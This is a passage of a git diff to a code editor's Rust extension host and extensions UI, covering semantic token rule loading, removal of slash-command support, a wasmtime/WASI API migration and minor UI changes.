ExtensionDebugAdapterProviderProxy, ExtensionEvents, ExtensionGrammarProxy, ExtensionHostProxy, ExtensionLanguageProxy, - ExtensionLanguageServerProxy, ExtensionSlashCommandProxy, ExtensionSnippetProxy, - ExtensionThemeProxy, + ExtensionLanguageServerProxy, ExtensionSnippetProxy, ExtensionThemeProxy, }; use fs::{Fs, RemoveOptions}; use futures::future::join_all; @@ -32,8 +31,8 @@ use futures::{ select_biased, }; use gpui::{ - App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Global, Task, WeakEntity, - actions, + App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Global, Task, UpdateGlobal as _, + WeakEntity, actions, }; use http_client::{AsyncBody, HttpClient, HttpClientWithUrl}; use language::{ @@ -46,7 +45,7 @@ use release_channel::ReleaseChannel; use remote::RemoteClient; use semver::Version; use serde::{Deserialize, Serialize}; -use settings::Settings; +use settings::{SemanticTokenRules, Settings, SettingsStore}; use std::ops::RangeInclusive; use std::str::FromStr; use std::{ @@ -55,6 +54,7 @@ use std::{ sync::Arc, time::{Duration, Instant}, }; +use task::TaskTemplates; use url::Url; use util::{ResultExt, paths::RemotePathBuf}; use wasm_host::{ @@ -1208,9 +1208,6 @@ impl ExtensionStore { for locator in extension.manifest.debug_locators.keys() { self.proxy.unregister_debug_locator(locator.clone()); } - for command_name in extension.manifest.slash_commands.keys() { - self.proxy.unregister_slash_command(command_name.clone()); - } } self.wasm_extensions @@ -1220,6 +1217,15 @@ impl ExtensionStore { self.proxy .remove_languages(&languages_to_remove, &grammars_to_remove); + // Remove semantic token rules for languages being unloaded. + if !languages_to_remove.is_empty() { + SettingsStore::update_global(cx, |store, cx| { + for language in &languages_to_remove { + store.remove_language_semantic_token_rules(language.as_ref(), cx); + } + }); + } + let mut grammars_to_add = Vec::new(); let mut themes_to_add = Vec::new(); let mut icon_themes_to_add = Vec::new(); @@ -1267,23 +1273,33 @@ impl ExtensionStore { .iter() .filter(|(_, entry)| extensions_to_load.contains(&entry.extension)) .collect::>(); + let mut semantic_token_rules_to_add: Vec<(LanguageName, SemanticTokenRules)> = Vec::new(); for (language_name, language) in languages_to_add { let mut language_path = self.installed_dir.clone(); language_path.extend([ Path::new(language.extension.as_ref()), language.path.as_path(), ]); + + // Load semantic token rules if present in the language directory. + let rules_path = language_path.join(SemanticTokenRules::FILE_NAME); + if std::fs::exists(&rules_path).is_ok_and(|exists| exists) + && let Some(rules) = SemanticTokenRules::load(&rules_path).log_err() + { + semantic_token_rules_to_add.push((language_name.clone(), rules)); + } + self.proxy.register_language( language_name.clone(), language.grammar.clone(), language.matcher.clone(), language.hidden, Arc::new(move || { - let config = std::fs::read_to_string(language_path.join("config.toml"))?; - let config: LanguageConfig = ::toml::from_str(&config)?; + let config = + LanguageConfig::load(language_path.join(LanguageConfig::FILE_NAME))?; let queries = load_plugin_queries(&language_path); let context_provider = - std::fs::read_to_string(language_path.join("tasks.json")) + std::fs::read_to_string(language_path.join(TaskTemplates::FILE_NAME)) .ok() .and_then(|contents| { let definitions = @@ -1302,6 +1318,15 @@ impl ExtensionStore { ); } + // Register semantic token rules for newly loaded extension languages. + if !semantic_token_rules_to_add.is_empty() { + SettingsStore::update_global(cx, |store, cx| { + for (language_name, rules) in semantic_token_rules_to_add { + store.set_language_semantic_token_rules(language_name.0.clone(), rules, cx); + } + }); + } + let fs = self.fs.clone(); let wasm_host = self.wasm_host.clone(); let root_dir = self.installed_dir.clone(); @@ -1401,21 +1426,6 @@ impl ExtensionStore { } } - for (slash_command_name, slash_command) in &manifest.slash_commands { - this.proxy.register_slash_command( - extension.clone(), - extension::SlashCommand { - name: slash_command_name.to_string(), - description: slash_command.description.to_string(), - // We don't currently expose this as a configurable option, as it currently drives - // the `menu_text` on the `SlashCommand` trait, which is not used for slash commands - // defined in extensions, as they are not able to be added to the menu. - tooltip_text: String::new(), - requires_argument: slash_command.requires_argument, - }, - ); - } - for id in manifest.context_servers.keys() { this.proxy .register_context_server(extension.clone(), id.clone(), cx); @@ -1544,7 +1554,7 @@ impl ExtensionStore { if !fs_metadata.is_dir { continue; } - let language_config_path = language_path.join("config.toml"); + let language_config_path = language_path.join(LanguageConfig::FILE_NAME); let config = fs.load(&language_config_path).await.with_context(|| { format!("loading language config from {language_config_path:?}") })?; @@ -1667,7 +1677,7 @@ impl ExtensionStore { cx.background_spawn(async move { const EXTENSION_TOML: &str = "extension.toml"; const EXTENSION_WASM: &str = "extension.wasm"; - const CONFIG_TOML: &str = "config.toml"; + const CONFIG_TOML: &str = LanguageConfig::FILE_NAME; if is_dev { let manifest_toml = toml::to_string(&loaded_extension.manifest)?; diff --git a/crates/extension_host/src/extension_store_test.rs b/crates/extension_host/src/extension_store_test.rs index fa93709d077d435e9d6b579ece8890885675329d..a2722da336b4d52a04a7d6da3c22347a3535bf2b 100644 --- a/crates/extension_host/src/extension_store_test.rs +++ b/crates/extension_host/src/extension_store_test.rs @@ -216,6 +216,7 @@ async fn test_extension_store(cx: &mut TestAppContext) { matcher: LanguageMatcher { path_suffixes: vec!["erb".into()], first_line_pattern: None, + ..LanguageMatcher::default() }, }, ), @@ -229,6 +230,7 @@ async fn test_extension_store(cx: &mut TestAppContext) { matcher: LanguageMatcher { path_suffixes: vec!["rb".into()], first_line_pattern: None, + ..LanguageMatcher::default() }, }, ), @@ -1005,7 +1007,7 @@ fn init_test(cx: &mut TestAppContext) { cx.set_global(store); release_channel::init(semver::Version::new(0, 0, 0), cx); extension::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); gpui_tokio::init(cx); }); } diff --git a/crates/extension_host/src/headless_host.rs b/crates/extension_host/src/headless_host.rs index 290dbb6fd40fc3c15dcb210c767b9102b7117544..7c30228257dbaa037fbc772be822a1000adfdfef 100644 --- a/crates/extension_host/src/headless_host.rs +++ b/crates/extension_host/src/headless_host.rs @@ -138,7 +138,9 @@ impl HeadlessExtensionStore { for language_path in &manifest.languages { let language_path = extension_dir.join(language_path); - let config = fs.load(&language_path.join("config.toml")).await?; + let config = fs + .load(&language_path.join(LanguageConfig::FILE_NAME)) + .await?; let mut config = ::toml::from_str::(&config)?; this.update(cx, |this, _cx| { @@ -279,7 +281,7 @@ impl HeadlessExtensionStore { fs.rename(&tmp_path, &path, RenameOptions::default()) .await - .context("Failed to rename {tmp_path:?} to {path:?}")?; + .with_context(|| format!("Failed to rename {tmp_path:?} to {path:?}"))?; Self::load_extension(this, extension, cx).await }) diff --git a/crates/extension_host/src/wasm_host.rs b/crates/extension_host/src/wasm_host.rs index fe3c11de3ae78115b8e5db08884b7e07be152324..87a2032e831fc942f6848428a901a9fe3f613fc8 100644 --- a/crates/extension_host/src/wasm_host.rs +++ b/crates/extension_host/src/wasm_host.rs @@ -42,7 +42,7 @@ use wasmtime::{ CacheStore, Engine, Store, component::{Component, ResourceTable}, }; -use wasmtime_wasi::p2::{self as wasi, IoView as _}; +use wasmtime_wasi::{WasiCtx, WasiCtxBuilder, WasiCtxView, WasiView}; use wit::Extension; pub struct WasmHost { @@ -93,7 +93,7 @@ impl extension::Extension for WasmExtension { ) -> Result { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let command = extension .call_language_server_command( store, @@ -119,7 +119,7 @@ impl extension::Extension for WasmExtension { ) -> Result> { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let options = extension .call_language_server_initialization_options( store, @@ -143,7 +143,7 @@ impl extension::Extension for WasmExtension { ) -> Result> { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let options = extension .call_language_server_workspace_configuration( store, @@ -159,6 +159,48 @@ impl extension::Extension for WasmExtension { .await? } + async fn language_server_initialization_options_schema( + &self, + language_server_id: LanguageServerName, + worktree: Arc, + ) -> Result> { + self.call(|extension, store| { + async move { + let resource = store.data_mut().table.push(worktree)?; + extension + .call_language_server_initialization_options_schema( + store, + &language_server_id, + resource, + ) + .await + } + .boxed() + }) + .await? + } + + async fn language_server_workspace_configuration_schema( + &self, + language_server_id: LanguageServerName, + worktree: Arc, + ) -> Result> { + self.call(|extension, store| { + async move { + let resource = store.data_mut().table.push(worktree)?; + extension + .call_language_server_workspace_configuration_schema( + store, + &language_server_id, + resource, + ) + .await + } + .boxed() + }) + .await? + } + async fn language_server_additional_initialization_options( &self, language_server_id: LanguageServerName, @@ -167,7 +209,7 @@ impl extension::Extension for WasmExtension { ) -> Result> { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let options = extension .call_language_server_additional_initialization_options( store, @@ -192,7 +234,7 @@ impl extension::Extension for WasmExtension { ) -> Result> { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let options = extension .call_language_server_additional_workspace_configuration( store, @@ -289,7 +331,7 @@ impl extension::Extension for WasmExtension { self.call(|extension, store| { async move { let resource = if let Some(delegate) = delegate { - Some(store.data_mut().table().push(delegate)?) + Some(store.data_mut().table.push(delegate)?) } else { None }; @@ -313,7 +355,7 @@ impl extension::Extension for WasmExtension { ) -> Result { self.call(|extension, store| { async move { - let project_resource = store.data_mut().table().push(project)?; + let project_resource = store.data_mut().table.push(project)?; let command = extension .call_context_server_command(store, context_server_id.clone(), project_resource) .await? @@ -332,7 +374,7 @@ impl extension::Extension for WasmExtension { ) -> Result> { self.call(|extension, store| { async move { - let project_resource = store.data_mut().table().push(project)?; + let project_resource = store.data_mut().table.push(project)?; let Some(configuration) = extension .call_context_server_configuration( store, @@ -375,7 +417,7 @@ impl extension::Extension for WasmExtension { ) -> Result<()> { self.call(|extension, store| { async move { - let kv_store_resource = store.data_mut().table().push(kv_store)?; + let kv_store_resource = store.data_mut().table.push(kv_store)?; extension .call_index_docs( store, @@ -402,7 +444,7 @@ impl extension::Extension for WasmExtension { ) -> Result { self.call(|extension, store| { async move { - let resource = store.data_mut().table().push(worktree)?; + let resource = store.data_mut().table.push(worktree)?; let dap_binary = extension .call_get_dap_binary(store, dap_name, config, user_installed_path, resource) .await? @@ -490,7 +532,7 @@ impl extension::Extension for WasmExtension { pub struct WasmState { manifest: Arc, pub table: ResourceTable, - ctx: wasi::WasiCtx, + ctx: WasiCtx, pub host: Arc, pub(crate) capability_granter: CapabilityGranter, } @@ -684,7 +726,7 @@ impl WasmHost { }) } - async fn build_wasi_ctx(&self, manifest: &Arc) -> Result { + async fn build_wasi_ctx(&self, manifest: &Arc) -> Result { let extension_work_dir = self.work_dir.join(manifest.id.as_ref()); self.fs .create_dir(&extension_work_dir) @@ -697,7 +739,7 @@ impl WasmHost { #[cfg(target_os = "windows")] let path = path.replace('\\', "/"); - let mut ctx = wasi::WasiCtxBuilder::new(); + let mut ctx = WasiCtxBuilder::new(); ctx.inherit_stdio() .env("PWD", &path) .env("RUST_BACKTRACE", "full"); @@ -905,15 +947,16 @@ impl WasmState { } } -impl wasi::IoView for WasmState { - fn table(&mut self) -> &mut ResourceTable { - &mut self.table - } +impl wasmtime::component::HasData for WasmState { + type Data<'a> = &'a mut WasmState; } -impl wasi::WasiView for WasmState { - fn ctx(&mut self) -> &mut wasi::WasiCtx { - &mut self.ctx +impl WasiView for WasmState { + fn ctx(&mut self) -> WasiCtxView<'_> { + WasiCtxView { + ctx: &mut self.ctx, + table: &mut self.table, + } } } diff --git a/crates/extension_host/src/wasm_host/wit.rs b/crates/extension_host/src/wasm_host/wit.rs index ddd3f604c991a43bc58f494410db1be22a93a772..27847422f01680240119877e0864491dd7660d68 100644 --- a/crates/extension_host/src/wasm_host/wit.rs +++ b/crates/extension_host/src/wasm_host/wit.rs @@ -42,18 +42,14 @@ pub use since_v0_0_4::LanguageServerConfig; pub fn new_linker( executor: &BackgroundExecutor, - f: impl Fn(&mut Linker, fn(&mut WasmState) -> &mut WasmState) -> Result<()>, + f: impl FnOnce(&mut Linker) -> Result<()>, ) -> Linker { let mut linker = Linker::new(&wasm_engine(executor)); wasmtime_wasi::p2::add_to_linker_async(&mut linker).unwrap(); - f(&mut linker, wasi_view).unwrap(); + f(&mut linker).unwrap(); linker } -fn wasi_view(state: &mut WasmState) -> &mut WasmState { - state -} - /// Returns whether the given Wasm API version is supported by the Wasm host. pub fn is_supported_wasm_api_version(release_channel: ReleaseChannel, version: Version) -> bool { wasm_api_version_range(release_channel).contains(&version) @@ -465,6 +461,60 @@ impl Extension { } } + pub async fn call_language_server_initialization_options_schema( + &self, + store: &mut Store, + language_server_id: &LanguageServerName, + resource: Resource>, + ) -> Result> { + match self { + Extension::V0_8_0(ext) => { + ext.call_language_server_initialization_options_schema( + store, + &language_server_id.0, + resource, + ) + .await + } + Extension::V0_6_0(_) + | Extension::V0_5_0(_) + | Extension::V0_4_0(_) + | Extension::V0_3_0(_) + | Extension::V0_2_0(_) + | Extension::V0_1_0(_) + | Extension::V0_0_6(_) + | Extension::V0_0_4(_) + | Extension::V0_0_1(_) => Ok(None), + } + } + + pub async fn call_language_server_workspace_configuration_schema( + &self, + store: &mut Store, + language_server_id: &LanguageServerName, + resource: Resource>, + ) -> Result> { + match self { + Extension::V0_8_0(ext) => { + ext.call_language_server_workspace_configuration_schema( + store, + &language_server_id.0, + resource, + ) + .await + } + Extension::V0_6_0(_) + | Extension::V0_5_0(_) + | Extension::V0_4_0(_) + | Extension::V0_3_0(_) + | Extension::V0_2_0(_) + | Extension::V0_1_0(_) + | Extension::V0_0_6(_) + | Extension::V0_0_4(_) + | Extension::V0_0_1(_) => Ok(None), + } + } + pub async fn call_language_server_additional_initialization_options( &self, store: &mut Store, diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_0_1.rs b/crates/extension_host/src/wasm_host/wit/since_v0_0_1.rs index fa7539eec9f454c95782cd0249664693074abfba..c231b7e5d69157d523973455b2437a576392a00d 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_0_1.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_0_1.rs @@ -12,8 +12,12 @@ use wasmtime::component::{Linker, Resource}; pub const MIN_VERSION: Version = Version::new(0, 0, 1); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.0.1", with: { "worktree": ExtensionWorktree, @@ -26,7 +30,11 @@ pub type ExtensionWorktree = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::DownloadedFileType { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_0_4.rs b/crates/extension_host/src/wasm_host/wit/since_v0_0_4.rs index 6d7db749f0cd021bfb084eba1bc20ce72780f3d8..41d652cec3087e8e5458a048689be4494de63356 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_0_4.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_0_4.rs @@ -10,8 +10,12 @@ use wasmtime::component::{Linker, Resource}; pub const MIN_VERSION: Version = Version::new(0, 0, 4); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.0.4", with: { "worktree": ExtensionWorktree, @@ -24,7 +28,11 @@ pub type ExtensionWorktree = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::DownloadedFileType { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_0_6.rs b/crates/extension_host/src/wasm_host/wit/since_v0_0_6.rs index e5ff0322088470d47e903c4a83794b654bbba531..e1dfdf8248b41de2de5e9faff3d212d06f1349c4 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_0_6.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_0_6.rs @@ -10,8 +10,12 @@ use wasmtime::component::{Linker, Resource}; pub const MIN_VERSION: Version = Version::new(0, 0, 6); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.0.6", with: { "worktree": ExtensionWorktree, @@ -31,7 +35,11 @@ pub type ExtensionWorktree = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::Command { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs index 0caaa86c2413f1b279319eeea4d8577d1ed4b5a5..4cd034d4d6af02971468ba8e57e1eebf9078353f 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs @@ -26,8 +26,12 @@ use super::{latest, since_v0_6_0}; pub const MIN_VERSION: Version = Version::new(0, 1, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.1.0", with: { "worktree": ExtensionWorktree, @@ -52,7 +56,11 @@ pub type ExtensionHttpResponseStream = Arc &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::Command { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_2_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_2_0.rs index 074cce73c22d547cd3198a672e6f8cdc5f750d49..691e6d2dd549b64c3783406af210b6b48f4a1dbc 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_2_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_2_0.rs @@ -11,8 +11,12 @@ use super::{latest, since_v0_6_0}; pub const MIN_VERSION: Version = Version::new(0, 2, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.2.0", with: { "worktree": ExtensionWorktree, @@ -40,7 +44,11 @@ pub type ExtensionKeyValueStore = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::Command { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_3_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_3_0.rs index 072ad42f2b9c2f5b3a8556b237f3907052665370..53aa65d5187663ea86fa465af76cf3aebc7844e4 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_3_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_3_0.rs @@ -11,8 +11,12 @@ use super::{latest, since_v0_6_0}; pub const MIN_VERSION: Version = Version::new(0, 3, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.3.0", with: { "worktree": ExtensionWorktree, @@ -40,7 +44,11 @@ pub type ExtensionKeyValueStore = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::CodeLabel { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_4_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_4_0.rs index 4f1d5c6a48c13ff09a5c81e2b43683fa50a7ccec..44b7d7ba1ad4e3235e8772a051bb906f87c64325 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_4_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_4_0.rs @@ -11,8 +11,12 @@ use super::{latest, since_v0_6_0}; pub const MIN_VERSION: Version = Version::new(0, 4, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.4.0", with: { "worktree": ExtensionWorktree, @@ -40,7 +44,11 @@ pub type ExtensionKeyValueStore = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::CodeLabel { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_5_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_5_0.rs index 84f73f567750081d406b20025f0b4598cfd0f9af..4dff0d90a94fe1128c6182592093b38cf43fe573 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_5_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_5_0.rs @@ -11,8 +11,12 @@ use super::{latest, since_v0_6_0}; pub const MIN_VERSION: Version = Version::new(0, 5, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.5.0", with: { "worktree": ExtensionWorktree, @@ -41,7 +45,11 @@ pub type ExtensionKeyValueStore = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::CodeLabel { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs index 202bcd6ce959b27b3b7ecf8e15830cb1955ec104..bc5674b051772e464c0cbdb74e75f935959e05d8 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs @@ -12,8 +12,12 @@ pub const MIN_VERSION: Version = Version::new(0, 6, 0); pub const MAX_VERSION: Version = Version::new(0, 7, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.6.0", with: { "worktree": ExtensionWorktree, @@ -43,7 +47,11 @@ pub type ExtensionKeyValueStore = Arc; pub fn linker(executor: &BackgroundExecutor) -> &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for latest::CodeLabel { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs index d7cf29ad0a3fcc7448d5bf44a8a2612d55e07a88..660ddd9688f7dc69f3ec3c52452122fd807257ad 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs @@ -40,8 +40,12 @@ pub const MIN_VERSION: Version = Version::new(0, 8, 0); pub const MAX_VERSION: Version = Version::new(0, 8, 0); wasmtime::component::bindgen!({ - async: true, - trappable_imports: true, + imports: { + default: async | trappable, + }, + exports: { + default: async, + }, path: "../extension_api/wit/since_v0.8.0", with: { "worktree": ExtensionWorktree, @@ -65,7 +69,11 @@ pub type ExtensionHttpResponseStream = Arc &'static Linker { static LINKER: OnceLock> = OnceLock::new(); - LINKER.get_or_init(|| super::new_linker(executor, Extension::add_to_linker)) + LINKER.get_or_init(|| { + super::new_linker(executor, |linker| { + Extension::add_to_linker::<_, WasmState>(linker, |s| s) + }) + }) } impl From for std::ops::Range { @@ -941,6 +949,7 @@ impl ExtensionImports for WasmState { ); Ok(serde_json::to_string(&settings::LanguageSettings { tab_size: settings.tab_size, + preferred_line_length: settings.preferred_line_length, })?) } "lsp" => { diff --git a/crates/extensions_ui/Cargo.toml b/crates/extensions_ui/Cargo.toml index a80defd128549e9f2ed6b634c188a7f2f319ef6a..6b6b6838313ecc8738df769609cf236e3f6e0bfb 100644 --- a/crates/extensions_ui/Cargo.toml +++ b/crates/extensions_ui/Cargo.toml @@ -35,7 +35,7 @@ settings.workspace = true smallvec.workspace = true strum.workspace = true telemetry.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true vim_mode_setting.workspace = true diff --git a/crates/extensions_ui/src/extension_suggest.rs b/crates/extensions_ui/src/extension_suggest.rs index 7ad4c1540a419f0cdeedb2aeff7661aafac5ef4c..c78db92c2fd3b24ceb78c7a33b4ab177be483b9d 100644 --- a/crates/extensions_ui/src/extension_suggest.rs +++ b/crates/extensions_ui/src/extension_suggest.rs @@ -1,12 +1,13 @@ use std::collections::HashMap; use std::sync::{Arc, OnceLock}; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use editor::Editor; use extension_host::ExtensionStore; use gpui::{AppContext as _, Context, Entity, SharedString, Window}; use language::Buffer; use ui::prelude::*; +use util::ResultExt; use util::rel_path::RelPath; use workspace::notifications::simple_message_notification::MessageNotification; use workspace::{Workspace, notifications::NotificationId}; @@ -21,7 +22,7 @@ const SUGGESTIONS_BY_EXTENSION_ID: &[(&str, &[&str])] = &[ ("dart", &["dart"]), ("dockerfile", &["Dockerfile"]), ("elisp", &["el"]), - ("elixir", &["ex", "exs", "heex"]), + ("elixir", &["eex", "ex", "exs", "heex", "leex", "neex"]), ("elm", &["elm"]), ("erlang", &["erl", "hrl"]), ("fish", &["fish"]), @@ -147,7 +148,8 @@ pub(crate) fn suggest(buffer: Entity, window: &mut Window, cx: &mut Cont }; let key = language_extension_key(&extension_id); - let Ok(None) = KEY_VALUE_STORE.read_kvp(&key) else { + let kvp = KeyValueStore::global(cx); + let Ok(None) = kvp.read_kvp(&key) else { return; }; @@ -193,9 +195,11 @@ pub(crate) fn suggest(buffer: Entity, window: &mut Window, cx: &mut Cont .secondary_icon_color(Color::Error) .secondary_on_click(move |_window, cx| { let key = language_extension_key(&extension_id); - db::write_and_log(cx, move || { - KEY_VALUE_STORE.write_kvp(key, "dismissed".to_string()) - }); + let kvp = KeyValueStore::global(cx); + cx.background_spawn(async move { + kvp.write_kvp(key, "dismissed".to_string()).await.log_err() + }) + .detach(); }) }) }); diff --git a/crates/extensions_ui/src/extensions_ui.rs b/crates/extensions_ui/src/extensions_ui.rs index 1458b2104f31f4d987319c87a41bfd5538b2727f..19bf62d8bbc476049548f65616e6ca1e12f5378a 100644 --- a/crates/extensions_ui/src/extensions_ui.rs +++ b/crates/extensions_ui/src/extensions_ui.rs @@ -23,7 +23,7 @@ use project::DirectoryLister; use release_channel::ReleaseChannel; use settings::{Settings, SettingsContent}; use strum::IntoEnumIterator as _; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Banner, Chip, ContextMenu, Divider, PopoverMenu, ScrollableHandle, Switch, ToggleButtonGroup, ToggleButtonGroupSize, ToggleButtonGroupStyle, ToggleButtonSimple, Tooltip, WithScrollbar, @@ -69,10 +69,6 @@ pub fn init(cx: &mut App) { ExtensionProvides::ContextServers } ExtensionCategoryFilter::AgentServers => ExtensionProvides::AgentServers, - ExtensionCategoryFilter::SlashCommands => ExtensionProvides::SlashCommands, - ExtensionCategoryFilter::IndexedDocsProviders => { - ExtensionProvides::IndexedDocsProviders - } ExtensionCategoryFilter::Snippets => ExtensionProvides::Snippets, ExtensionCategoryFilter::DebugAdapters => ExtensionProvides::DebugAdapters, }); @@ -870,9 +866,12 @@ impl ExtensionsPage { ) .child( h_flex() + .min_w_0() + .w_full() .justify_between() .child( h_flex() + .min_w_0() .gap_1() .child( Icon::new(IconName::Person) @@ -889,6 +888,7 @@ impl ExtensionsPage { .child( h_flex() .gap_1() + .flex_shrink_0() .child({ let repo_url_for_tooltip = repository_url.clone(); @@ -1052,10 +1052,11 @@ impl ExtensionsPage { "Install", ) .style(ButtonStyle::Tinted(ui::TintColor::Accent)) - .icon(IconName::Download) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::Download) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click({ let extension_id = extension.id.clone(); move |_, _, cx| { @@ -1074,10 +1075,11 @@ impl ExtensionsPage { "Install", ) .style(ButtonStyle::Tinted(ui::TintColor::Accent)) - .icon(IconName::Download) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::Download) + .size(IconSize::Small) + .color(Color::Muted), + ) .disabled(true), configure: None, upgrade: None, @@ -1475,10 